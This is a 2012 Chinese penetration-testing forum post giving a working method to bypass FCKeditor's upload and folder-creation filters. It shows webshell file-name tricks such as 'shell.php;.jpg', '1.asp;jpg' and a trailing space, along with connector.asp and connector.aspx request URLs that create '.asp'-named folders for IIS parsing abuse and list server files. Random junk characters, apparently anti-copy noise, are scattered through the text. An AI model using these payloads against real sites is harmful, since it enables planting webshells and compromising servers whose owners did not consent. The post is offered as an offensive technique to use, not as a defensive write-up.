中国网络渗透测试联盟

标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破 [打印本页]

作者: admin    时间: 2012-12-31 09:27
标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg: w4 m/ V: ~0 S( M; \  g7 z  ^$ h3 p

3 _. O! u1 ]# ^/ d/ }* T提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。  ^7 {: ~& l# I; m5 j, _0 I) y

8 w" V1 a/ ~7 K# V继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。* I0 T" ]  ?; E* E) A7 P9 ?# D
2 I, I, \/ c0 `0 F; S# j
突破建立文件夹:* {! W4 o! y: b5 i& Q1 M8 [- w  z

4 {! p0 h7 D  \editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
0 d6 {. Y# c4 E& e8 C/ x- \: K* y: Y/ m: u" c9 Q
参数:# [- N+ v  f& z$ t

. T1 ~. ?0 j! H" j) V当前目录名:CurrentFolder=/qing.asp
/ J. t# I4 F% x# w( S1 q8 j
8 h8 t6 f7 ^* W9 B2 S  c2 P新的目录名:NewFolderName=x.asp# _5 d6 r, D4 M
5 q3 |( T  n" {: p+ {- ?  Q
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……& X! P& ~$ ~; j: n6 [3 ]& C8 J5 v
4 O% y0 \8 U0 M2 s, g
那么 x.asp 就已经建立生成了,此方法百试百灵!
8 @) |+ e6 e  i2 L0 X# u* r, c. y$ ?
新建文件夹参数 x.asp,基本都能搞定。
0 ?9 }( S( L1 N" ?- \- n
' S* k! E  Z1 b' L+ U3 e6 I下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
" ?$ K( a( Y& m* A8 h9 I9 ]1 e8 A" I+ _' n1 ^7 W  i
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp7 u! X+ f2 j, V( I- y2 h) J
" X& Z6 q3 W" i( j" x* z8 z0 r( z
获取文件列表  b! a! O  k3 O
       aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F+ G! Z! v7 z: y0 F4 e

" |/ s! z6 q# p- O) ~  H




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2